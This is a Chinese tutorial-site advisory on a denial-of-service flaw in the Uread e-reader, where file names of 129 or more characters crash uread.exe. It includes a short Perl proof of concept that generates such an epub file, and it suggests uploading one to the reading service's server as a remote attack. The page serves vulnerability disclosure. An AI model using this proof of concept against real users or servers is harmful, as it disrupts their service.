手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >Uread阅读器拒绝服务漏洞的分析与解决
Uread阅读器拒绝服务漏洞的分析与解决
摘要:Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动...

Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。

远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。

测试证明

-----------------------------------------------------------

#!/usr/bin/perl -w

$filename="a"x129;

print "------Generate testfile "a"x129.epub------n";

open(TESTFILE, ">$filename.epub");

sleep

(3);

close(TESTFILE);

print "------Complete--n";

exit

(1);

-----------------------------------------------------------

修复方案:

目前厂商还没有提供补丁或者升级程序。

【Uread阅读器拒绝服务漏洞的分析与解决】相关文章:

Kesion cms注入漏洞分析及其修复方案

shell脚本监控MySQL服务是否正常

腾讯手机管家怎么样清理手机的垃圾?

系统里存在安全漏洞的九大高危区域

McAfee防火墙导致Jmail发邮件失败的解决方法

傲游浏览器官网存在SQL注射漏洞分析

防止cain挂掉目标服务器的注意事项

php intval()函数使用不当的安全漏洞分析

服务器上网站被挂Iframe木马的解决方法

360自动漏洞修复怎么关闭

精品推荐
分类导航